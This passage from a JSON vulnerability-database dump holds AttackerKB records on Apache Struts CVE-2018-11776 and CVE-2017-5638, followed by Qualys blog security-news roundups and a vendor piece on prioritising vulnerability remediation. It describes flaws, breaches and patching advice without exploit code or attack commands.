powering the server. An indicator of compromise will be present in the logs at the `DEBUG` level. This IOC will look like a malformed value in the `Executing action method =` message.\n\nThe default configuration is not vulnerable. The `alwaysSelectFullNamespace` option must be enabled. This can be done by adding `<constant name=\"struts.mapper.alwaysSelectFullNamespace\" value=\"true\" />` to the `struts.xml` configuration file.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T00:00:00", "type": "attackerkb", "title": "CVE-2018-11776", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2020-07-30T00:00:00", "id": "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "href": "https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T17:24:09", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2020-07-30T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": "https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:12", "description": "![](https://blog.qualys.com/wp-content/uploads/2018/05/Twitter-logo-600x600.png)The cyber security news cycle is always active, so to help you stay in the loop here\u2019s a selection of incidents that caught our attention over the past week or so involving, among others, Twitter, Cisco and GPON routers.\n\n### Twitter picks a good day for password-change call\n\nAs \u201cchange your password\u201d calls from vendors go, the one from Twitter last week ranks right up there, and not just because of the scope of users involved. As Jon Swartz [pointed out](<https://www.barrons.com/articles/twitters-avoids-ruffling-feathers-with-prompt-response-to-password-scare-1525453131>) in Barron\u2019s, Twitter\u2019s alert went out on Thursday, which happened to be [World Password Day](<https://mashable.com/2018/05/03/dashlane-password-manager-subscription-sale/#6KFatxI_kuq3>).\n\nThe social media juggernaut reached out to all of its 330 million users and [advised](<https://twitter.com/TwitterSupport/status/992132808192634881>) them to take a moment, go to their account settings page and enter a new password. Twitter also suggested they enable Twitter\u2019s two-step verification feature, a move strongly [endorsed by Forbes\u2019 Thomas Fox-Brewster](<https://www.forbes.com/sites/thomasbrewster/2018/05/04/get-twitter-two-factor-authentication-and-change-your-password/#67b7eb2218d8>). In addition, Twitter recommended that users change their password on any other online services where they used their Twitter password. (It bears repeating: It\u2019s a bad idea to re-use passwords.)\n\nThe reason for the brouhaha: An IT slip-up caused user passwords to be stored in plain text in an internal Twitter log. Twitter\u2019s security policy is to instead mask passwords using the \u201cbcrypt\u201d hashing technique. That way, passwords are stored on Twitter systems as a string of random characters.\n\nTwitter said it fixed the bug, and found no evidence that the data was compromised, but decided to alert its users \u201cout of an abundance of caution.\u201d \u201cWe found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again,\u201d CTO Parag Agrawal [wrote](<https://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html>) on the company\u2019s blog.\n\nAbsent from the company\u2019s communication: The number of passwords involved, and the length of time they were stored in plain text. Also of interest: Just two days before Twitter\u2019s alert, GitHub sent an email to some of its users telling them to change their passwords, [citing a very similar bug](<https://www.zdnet.com/article/github-says-bug-exposed-account-passwords/>).\n\n### Another WebEx bug discovered\n\nCisco has disclosed a WebEx vulnerability ([CVE-2018-0264](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180502-war>)) that could allow attackers to run code in a compromised system, the second WebEx bug announced in recent weeks. This time around, the problem lies within the Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) files, which is an application used to play back recorded meetings.\n\nAccording to Cisco, a likely attack scenario would involve a hacker sending out a link or email attachment with a malicious ARF file. If the recipient follows the link or opens the file, the unauthenticated attacker could then execute arbitrary code remotely on the targeted computer.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/05/Cisco-WebEx-logo.jpg)\n\n\u201cGiven how many businesses use WebEx, and how many workers attend WebEx meetings and events, it\u2019s easily conceivable that an email using a lure along the lines of \u201cThanks for attending our webinar. Follow the link to access the event on-demand\u201d could be spectacularly effective,\u201d Tara Seals [wrote](<https://threatpost.com/critical-cisco-webex-bug-allows-remote-code-execution/131657/>) in ThreatPost.\n\nCisco said it has updated affected versions of Cisco WebEx Business Suite meeting sites, Cisco WebEx Meetings sites, Cisco WebEx Meetings Server, and the Cisco WebEx ARF Player to address this vulnerability, for which no workarounds exist.\n\nIn late April, Cisco patched another vulnerability ([CVE-2018-0112](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-wbs>)) affecting Cisco WebEx Business Suite clients, Cisco WebEx Meetings, and Cisco WebEx Meetings Server, that could allow an authenticated, remote attacker to execute arbitrary code on a targeted system.\n\nThe bug was caused by insufficient input validation by the Cisco WebEx clients. An attack scenario would be for attackers to provide meeting attendees with a malicious Flash (.swf) file via the file-sharing capabilities of the WebEx client, according to Cisco. \n\n\u201cThe fact that WebEx is so widely used inside businesses could make it an increasing target for malicious hackers eager to break inside specific organisations,\u201d independent security analyst Graham Cluley [wrote](<https://www.grahamcluley.com/firms-running-cisco-webex-are-told-to-update-their-software-again/>).\n\n\u201cIf your business is not licensed for WebEx software updates you may be wise to either renegotiate your contract, or remove WebEx from your systems,\u201d he added.\n\n### Super fast routers found to be super vulnerable\n\nA million-plus GPON (Gigabit Passive Optical Networks) home routers have serious vulnerabilities that could give attackers complete control over the devices and, by extension, of people\u2019s home networks. That\u2019s according to vpnMentor, which documented its troubling findings in a [blog post](<https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/>) and [video](<https://www.youtube.com/watch?v=2tgRJa58jY0&feature=youtu.be>).\n\n\u201cWe found a way to bypass all authentication on the devices ([CVE-2018-10561](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10561>)). With this authentication bypass, we were also able to unveil another command injection vulnerability ([CVE-2018-10562](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10562>)) and execute commands on the device,\u201d reads the post.\n\nThis means that attackers could, among other things, use the vulnerabilities to see the IP address of specific routers, matching them to physical addresses in some cases, see what the user is doing on the web, and set up man-in-the-middle (MiTM) phishing pages, Seals [explained](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>) in ThreatPost.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/05/wlan-146898_1280-600x355.png)\n\n\u201cThere\u2019s a privacy aspect here too,\u201d Ariel Hochstadt, co-founder of vpnMentor, told ThreatPost. \u201cIt\u2019s possible to take an entire browsing history for someone from the last 30 days and send it to all of their friends, via Facebook or mail, because you have access to the browsing history and you can skim credentials.\u201d\n\nDays after these vulnerability disclosures, attackers began exploiting the vulnerabilities, an unsurprising development, since hackers crave opportunities to make botnets with compromised routers for DDoS attacks, Lucian Constantin [reported](<https://securityboulevard.com/2018/05/hackers-start-exploiting-recently-found-flaws-in-gpon-routers/>) Friday in Security Boulevard. \n\n\u201cThe fact that GPON devices are used for gigabit-size fiber connections makes them even more attractive since the firepower they provide is considerably greater than that of DSL or cable modems,\u201d he wrote.\n\nIn addition, this situation highlights the risks of using ISP-supplied home networking equipment, which is usually made by the same OEM, with the same firmware, but used by multiple ISPs globally under their own brands, according to Constantin.\n\n\u201cThis makes it difficult to identify all vulnerable devices when a security issue is found. It\u2019s also highly unlikely that any patch released by an OEM will ever reach all affected devices, since those patches need to be distributed by every ISP that uses those devices,\u201d Constantin wrote.\n\n**In other security news \u2026**\n\n * The National Institute of Standards and Technology (NIST) has [released](<https://www.nist.gov/news-events/news/2018/04/nist-releases-version-11-its-popular-cybersecurity-framework>) version 1.1 of the Framework for Improving Critical Infrastructure Cybersecurity, four years after the original version came out. ThreatPost has a [detailed rundown](<https://threatpost.com/nist-updates-cybersecurity-framework-to-tackle-supply-chain-threats-vulnerability-disclosure-and-more/131534/>) of what\u2019s new.\n * TrendMicro issued a [warning](<https://blog.trendmicro.com/trendlabs-security-intelligence/facexworm-targets-cryptocurrency-trading-platforms-abuses-facebook-messenger-for-propagation/>) that the FacexWorm, a malicious Chrome browser extension which was discovered last year and spreads via Facebook Messenger, has been revamped and is now using \u201ca miscellany of techniques to target cryptocurrency trading platforms accessed on an affected browser.\"\n * Medical device maker Beckton Dickinson [disclosed](<https://www.bd.com/en-us/support/product-security-and-privacy/product-security-bulletin-for-wpa2-krack-wi-fi-vulnerability>) that some of its products are vulnerable to the [Krack Wi-Fi WPA2 vulnerabilities](<https://www.kb.cert.org/vuls/id/228519>) discovered last year. Lisa Vaas from Naked Security puts it all [in context](<https://nakedsecurity.sophos.com/2018/05/02/medical-devices-vulnerable-to-krack-wi-fi-attacks/>).", "cvss3": {}, "published": "2018-05-08T01:08:05", "type": "qualysblog", "title": "Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-0112", "CVE-2018-0264", "CVE-2018-10561", "CVE-2018-10562"], "modified": "2018-05-08T01:08:05", "id": "QUALYSBLOG:072B2FAC9B9B391A9AAB97CB87BCCB8C", "href": "https://blog.qualys.com/news/2018/05/07/timely-password-change-announcement-from-twitter-as-new-bugs-hit-webex-and-gpon-routers", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-14T20:46:20", "description": "Ransomware raids aimed at specific targets with big pockets. Another Struts vulnerability -- but scarier than last year\u2019s. An Android spyware that records your phone calls. These are some of the security news that have caught our attention.\n\n### New Struts Bug Should Be Patched Yesterday\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/struts-logo-300x150.png)Apache patched a serious remote code execution vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) affecting all supported versions -- 2.3 to 2.3.34 and 2.5 to 2.5.16 -- of the widely used Struts Java application framework. The bug is considered more dangerous than the one disclosed last year in Struts that was exploited in the massive data breach at Equifax.\n\nIn the Apache [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-057>), the vulnerability is rated \u201cCritical\u201d and users are advised to immediately upgrade to Struts 2.3.35 or Struts 2.5.17.\n\nThe remote code execution becomes possible \u201cwhen using results with no namespace and in same time, its upper action(s) have no or wildcard namespace\u201d and \u201cwhen using url tag which doesn\u2019t have value and action set,\u201d the bulletin reads.\n\nOrganizations should upgrade to the patched Struts versions even if their applications aren\u2019t vulnerable to this bug. \u201cAn inadvertent change to a Struts configuration file may render the application vulnerable in the future,\u201d [stated](<https://semmle.com/news/apache-struts-CVE-2018-11776>) Semmle, whose security researcher Man Yue Mo discovered this vulnerability.\n\nUpgrading should take first priority, considering that Struts is widely used for public web apps, vulnerable systems are easy to identify, and the bug is easy to exploit, according to the company.\n\n\u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk,\u201d said Pavel Avgustinov, a Semmle VP.\n\nWriting in the Qualys blog, Product Management Director Jimmy Graham [noted](<https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776>) that the vulnerability does not exist with a default configuration of Struts, but that \u201cit does exist in commonly seen configurations for some Struts plugins.\u201d\n\n\u201cDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2,\u201d Graham wrote. Qualys has defined two QIDs to detect this vulnerability (QID 13251 and QID 371151), and created dynamic [dashboards](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776?_ga=2.73902801.230834091.1535379602-620242525.1458325156>) to visualize it.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/struts-dashboard-2018.png)\n\nGraham also describes how the Qualys Web Application Firewall (WAF) can mitigate the vulnerability.\n\nMore information:\n\n[Apache Struts 2 namespace Remote Code Execution Vulnerability: CVE-2018-11776](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/?_ga=2.140995313.230834091.1535379602-620242525.1458325156>) _(Qualys)_\n\n[Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>) _(ThreatPost)_\n\n[Admins Urged: Stop Everything and Patch New Apache Struts Flaw](<https://www.infosecurity-magazine.com/news/admins-stop-everything-patch/>) _(InfoSecurity)_\n\n[Experts Urge Rapid Patching of \u2018Struts\u2019 Bug](<https://krebsonsecurity.com/2018/08/experts-urge-rapid-patching-of-struts-bug/>) _(Krebs on Security)_\n\n[PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) _(ThreatPost)_\n\n### Ransomware Campaign Attacks Selected Organizations\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/ransomware-2320941_1280-600x400.jpg)Cyber thieves recently began attacking handpicked corporations with ransomware and demanding skyhigh bitcoin payments.\n\nThe criminals are deliberately targeting specific large businesses, and they\u2019re using ransomware called Ryuk that\u2019s designed for tailored attacks. They reportedly netted more than $600,000 during the campaign\u2019s first two weeks.\n\n\u201cIts encryption scheme is intentionally built for small-scale operations, such that only crucial assets and resources are infected in each targeted network with its infection and distribution carried out manually by the attackers,\u201d CheckPoint researchers [wrote](<https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/>).\n\nThe implication is that prior to each attack, \u201cextensive network mapping, hacking and credential collection\u201d is conducted by the miscreants, believed to have ties to the notorious hacker collective Lazarus Group and be experienced in targeted attacks, according to the researchers.\n\nMore information:\n\n[This new ransomware campaign targets business and demands a massive bitcoin ransom](<https://www.zdnet.com/article/this-new-ransomware-campaign-targets-business-and-demands-a-massive-bitcoin-ransom/>) _(ZDnet)_\n\n[Ryuk Ransomware Emerges in Highly Targeted, Highly Lucrative Campaign](<https://threatpost.com/ryuk-ransomware-emerges-in-highly-targeted-highly-lucrative-campaign/136755/>) _(ThreatPost)_\n\n[Ryuk Ransomware Crew Makes $640,000 in Recent Activity Surge](<https://www.bleepingcomputer.com/news/security/ryuk-ransomware-crew-makes-640-000-in-recent-activity-surge/>) _(BleepingComputer)_\n\n### T-Mobile Hacked, Millions Affected\n\nPersonal information of 2 million T-Mobile customers, [including encrypted passwords](<https://motherboard.vice.com/en_us/article/a3qpk5/t-mobile-hack-data-breach-api-customer-data>), may have been accessed by hackers via a breached API on August 20.\n\nThe compromised data may have included names, billing zip codes, phone numbers, email addresses, and account numbers, but not financial information nor Social Security numbers, [according to the company](<https://www.t-mobile.com/customers/6305378821>). T-Mobile hasn\u2019t provided further details on the nature of the attack.\n\nOn related news, customer security PINs from T-Mobile and AT&T were found to be accessible due to unrelated flaws in partners\u2019 websites, [according to BuzzFeed](<https://www.buzzfeednews.com/article/nicolenguyen/tmobile-att-account-pin-security-flaw-apple>). Apple\u2019s online store exposed the T-Mobile data, while the website of phone insurance company Asurion exposed AT&T\u2019s data. Both companies fixed the flaws after being alerted to them.\n\nAccess to a mobile account PIN could let a hacker \u201ceasily commandeer your phone number and use it to trick the SMS-based authentication designed to verify your identity when you log on to your bank, email provider, or social media accounts,\u201d wrote Nicole Nguyen in BuzzFeed.\n\nMeanwhile, a security researcher was able to [enter a Sprint employee portal](<https://techcrunch.com/2018/08/25/hacker-accessed-sprint-portal-customer-data/>) protected by weak credentials, and said customer data could have been accessed.\n\nMore information:\n\n[Passwords Part of Data Breach, T-Mobile Admits: What to Do Now](<https://www.tomsguide.com/us/tmobile-breach-2018,news-27876.html>) _(Tom\u2019s Guide)_\n\n[Why T-Mobile's Data Breach Should Be a Wake-Up Call](<https://www.fool.com/investing/2018/08/27/why-t-mobiles-data-breach-should-be-a-wake-up-call.aspx>) _(Motley Fool)_\n\n[2 Million T-Mobile Customers Are Hit by a Data Breach](<https://www.consumerreports.org/privacy/2-million-t-mobile-customers-hit-by-data-breach/>) _(Consumer Reports)_\n\n[Security researchers found vulnerabilities at AT&T, T-Mobile, and Sprint that could have exposed customer data](<https://www.theverge.com/2018/8/25/17781906/att-tmobile-sprint-security-vulnerabilities-customer-information>) _(The Verge)_\n\n[T-Mobile, AT&T customer account PINs were exposed by website flaws](<https://www.engadget.com/2018/08/25/t-mobile-att-pin-vulnerability/>) _(Engadget)_\n\n### Android Malware Records Calls, Takes Videos\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/Android-logo-300x188.png)Malware that infects Android devices and conducts extensive snooping has been discovered bundled in a malicious app that mimics a legitimate one.\n\nCalled Triout, the spyware stealthily can record phone calls, log incoming text messages, take videos, snap photos, collect location data and transmit everything it collects to a command and control center, [according to Bitdefender](<https://www.bitdefender.com/files/News/CaseStudies/study/234/Bitdefender-Whitepaper-Triout-The-Malware-Framework-for-Android-That-Packs-Potent-Spyware-Capabilities.pdf>), which discovered it.\n\n\u201cThe malware was first observed lurking in an app, repackaged to look identical to a legitimate Android app called \u2018Sex Game.\u2019 It was available in the Google Play store starting in 2016, but has since been removed,\u201d a ThreatPost [article](<https://threatpost.com/triout-malware-carries-out-extensive-targeted-android-surveillance/136773/>) reads.\n\nMore information:\n\n[Android 'Triout' spyware records calls, sends photos and text messages to attackers](<https://www.csoonline.com/article/3299700/security/android-triout-spyware-records-calls-sends-photos-and-text-messages-to-attackers.html>) _(CSO)_\n\n[This Android spyware records calls and sends your pictures and location to hackers](<https://www.zdnet.com/article/android-spyware-malware-records-calls-and-sends-your-pictures-to-hackers/>) _(ZDnet)_\n\n[New Android Triout Malware Can Record Phone Calls, Steal Pictures](<https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/>) _(BleepingComputer)_\n\n### In Other News \u2026\n\n * Cyber thieves [stole](<https://cheddars.com/customer-notification/>) payment card information from Cheddar\u2019s Scratch Kitchen restaurants in 23 U.S. states for two months late last year, potentially affecting [almost 600,000 customers](<https://www.prnewswire.com/news-releases/notice-of-unauthorized-access-to-cheddars-scratch-kitchen-guest-data-300701161.html>).\n * Apple was hacked by a 16-year old Australian boy who told authorities he [dreamed of working](<https://hotforsecurity.bitdefender.com/blog/apple-hacked-by-16-year-old-who-dreamed-of-working-for-firm-20254.html>) at the company.\n * Adobe issued [out-of-band fixes](<https://helpx.adobe.com/security/products/photoshop/apsb18-28.html>) for remote code execution vulnerabilities in Photoshop CC, barely a week after its scheduled monthly set of patches.\n * Spyfone, a company that lets parents and employers monitor mobile devices, left an AWS S3 storage bucket unprotected, [exposing all manner of personal data](<https://motherboard.vice.com/amp/en_us/article/9kmj4v/spyware-company-spyfone-terabytes-data-exposed-online-leak>) from thousands of customers.", "cvss3": {}, "published": "2018-08-27T18:32:33", "type": "qualysblog", "title": "Security News: Hackers Aim Ransomware at Big Cos., as Experts Call for Swift Patching of Struts Bug", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-27T18:32:33", "id": "QUALYSBLOG:5E5409E093DE06FE967B988870D82540", "href": "https://blog.qualys.com/news/2018/08/27/security-news-hackers-aim-ransomware-at-big-cos-as-experts-call-for-swift-patching-of-struts-bug", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "![](https://blog.qualys.com/wp-content/uploads/2018/05/cyber-security-1923446_1920-600x384.png)Here\u2019s a stat that shows the importance of prioritizing vulnerability remediation: Almost 30% of the CVEs disclosed in 2017 had a CVSS score of \u201cHigh\u201d or \u201cCritical.\u201d That works out to about 3,000 such vulnerabilities, or about 58 every week.\n\nGiven this large number of severe vulnerabilities, it\u2019s critical for IT and security teams to make a deeper assessment of the risk they represent in the context of their organizations\u2019 IT environment.\n\nIf they identify the vulnerabilities that pose the highest risk to their organization\u2019s most critical assets, they\u2019ll be able to prioritize remediation accordingly and eliminate the most serious and pressing threats to their IT environment.\n\nHowever, as evidenced by the long list of major breaches caused by unpatched vulnerabilities, it\u2019s hard for many businesses, government agencies and not-for-profit organizations to prioritize remediation consistently and accurately.\n\n\u201cOne of the big challenges that we have as security professionals is trying to stay on top of our vulnerability management,\u201d Josh Zelonis, a Forrester Research analyst, said during a recent [webcast](<https://www.qualys.com/webcasts/prioritization-vulnerabilities-modern-it-environment/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=webcast&leadsource=344565181>).\n\nZelonis, who cited the CVE stat during the webcast, said that, according to a 2017 Forrester survey of global businesses, 58% of them experienced at least one breach in the previous 12 months. Among those, 41% of the breaches were carried out by exploiting a vulnerability.\n\n\u201cThis is really representative of the problems we\u2019re seeing in the industry with prioritization and getting patches deployed, and this is only increasing,\u201d he said.\n\n\u201cIn a post-Equifax world, VM is coming under increased scrutiny,\u201d Zelonis added, alluding to the massive data breach suffered by the credit reporting agency in 2017 after hackers exploited the Apache Struts vulnerability (CVE-2017-5638), which had been disclosed about six months before.\n\nRead on to learn valuable best practices for prioritizing remediation, and how Qualys can help your organization overcome this critical challenge.\n\n### Vulnerability management and prioritization tips\n\nAccording to Zelonis, the vulnerability risk management process has four main steps: \n\n * Asset identification\n * Enumeration of assets\n * Prioritization of patching\n * Remediation\n\nWhen assigning remediation priorities, it\u2019s key to examine the severity of the vulnerabilities in the context of each asset. \n\nFor example, it should be a top priority to remediate a critical vulnerability in an asset that\u2019s highly important. However, remediating that same vulnerability may not be a top priority when it\u2019s present in an asset of medium or low importance. \n\nIn vulnerability management, it\u2019s also helpful to use threat intelligence not just to detect threats, but to also preemptively patch using threat landscape trends as a guide.\n\n\u201cIt\u2019s important to understand how a vulnerability can be exploited so you can take a look at at the assets within your organization to figure out where patches need to be prioritized and applied,\u201d Zelonis said.\n\nThreat intelligence is also essential for security teams to be able to communicate effectively with C-level executives and board members, who are increasingly interested in staying informed about the organization\u2019s security posture and strategy.\n\n\u201cOnce you\u2019ve made it relevant to them, they\u2019re going to need to understand what you\u2019re doing to mitigate the situations and perhaps allocate additional budget where necessary,\u201d he said.\n\nIt\u2019s also important to communicate this information not just to the higher-ups, but also horizontally across other IT teams such as operations, and across business units, because vulnerability remediation requires cross-functional collaboration.\n\n\u201cThis is a major gap we see with organizations who are struggling to get items patched: The security team\u2019s priorities aren\u2019t echoed nor understood outside of the security team,\u201d he said.\n\nThe goal here is to make these other teams aware of the real risk and potential business impact of particular vulnerabilities.\n\nUltimately, organizations should evolve from vulnerability management to vulnerability risk management. That way, the focus isn\u2019t just on reducing false positives, but rather on assessing critical data points and metrics to attain an understanding of risk, according to Zelonis.\n\n### Qualys: Asset visibility, vulnerability management and threat prioritization\n\nWith Qualys, you\u2019ll get complete visibility of your IT assets wherever they reside -- on premises, in clouds or at remote endpoints -- and you\u2019ll be able to continuously detect and asses all your vulnerabilities, and precisely prioritize remediation.\n\nWith proper vulnerability management, you \u201cimmunize\u201d your IT assets against opportunistic attacks which are designed to exploit common, well-known bugs and which are the most likely to hit your network.\n\nLet\u2019s look at three Qualys products that work in tandem to provide you with this asset visibility, vulnerability detection and remediation prioritization.\n\n_Qualys AssetView_\n\n[Qualys AssetView](<https://www.qualys.com/apps/asset-inventory/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) automates collection and categorization of IT and security information, and provides a unified view of this data.\n\n\u201cIt brings IT and security data together,\u201d Qualys Product Management Director Jimmy Graham said during the webcast, titled \u201cPrioritization of Vulnerabilities in a Modern IT Environment.\u201d\n\n![](https://blog.qualys.com/wp-content/uploads/2018/05/ai-screenshot-dashboard-2x.jpg)\n\nThe data, which is fed into the Qualys Cloud Platform for aggregation, indexing, correlation, and analysis, is continuously collected and updated using a variety of sensors, including:\n\n * Physical and virtual appliances that scan IT assets located on-premises, in private clouds, or in virtualized environments\n * Cloud appliances that remotely scan your infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS) instances in commercial cloud computing platforms\n * Lightweight, all-purpose cloud agents installed on IT assets that continuously monitor them\n\nThe data is made searchable via AssetView\u2019s search engine using ad-hoc queries. In addition, any query can be turned into interactive, continuously updated widgets in AssetView\u2019s customizable and dynamic dashboards. You can also generate detailed and custom-tailored reports.\n\nThis inventory provides both a complete \u201chorizontal\u201d list of IT assets as well as deep \u201cvertical\u201d details for each asset, including hardware specs, installed software, network connections, approved users, applied patches, and open vulnerabilities. \n\nIn addition, Qualys AssetView lets you assign criticality rankings to assets, since not all assets carry the same weight within your organization. Qualys lets you [tag your assets](<https://blog.qualys.com/news/2017/02/28/making-asset-inventory-actionable-with-a-cloud-based-system>), so you put relevant labels on them in the inventory and organize them in multiple ways.\n\n_Qualys Vulnerability Management_\n\n[Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) provides continuous, comprehensive coverage and visibility, as well as constant monitoring and alerts, in a way that makes vulnerability assessment effective in a \u201cperimeter-less world,\u201d according to Graham.\n\n\u201cWe call that \u2018perimeter-less world\u2019 because we collect vulnerabilities from on premises devices, and from private and public clouds. Through the agent, we can collect vulnerability information from roaming devices like laptops that employees may be using in a coffee shop or at home,\u201d he said.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/05/vm-screenshot-report-2x.jpg)\n\nQualys VM maps all assets on the network, detailing their OS, ports, services and certificates, and scans them for vulnerabilities with Six Sigma 99.99966 percent accuracy. It assigns remediation tickets, manages exceptions, lists patches for each host, and integrates with existing IT ticketing systems.\n\nIn addition, VM generates comprehensive reports customized for different recipients \u2014 like IT pros, business executives or auditors \u2014 and incorporates context and insight, including progress against goals. Via VM\u2019s APIs, the reporting data can be integrated with other security and compliance systems.\n\nWhen VM is paired with the Qualys Continuous Monitoring (CM) app, you\u2019ll be alerted about potential threats \u2014 such as new hosts/OSes, expiring certificates, unexpected open ports and unauthorized software \u2014 so problems can be tackled before turning into breaches. \n\n_Qualys Threat Protection_\n\nTo prioritize remediation work, you must continuously correlate vulnerability disclosures with your organization\u2019s IT asset inventory, so that you get a clear picture of the vulnerabilities that exist in each IT asset.\n\nThis is what [Qualys Threat Protection (TP)](<https://www.qualys.com/apps/threat-protection/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) does, and more.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/05/tp-screenshot-dashboard-2x.jpg)\n\nQualys TP continuously correlates external real-time threat indicators (RTIs) against your internal vulnerabilities and IT asset data, so you can take full control of evolving threats and identify what to remediate 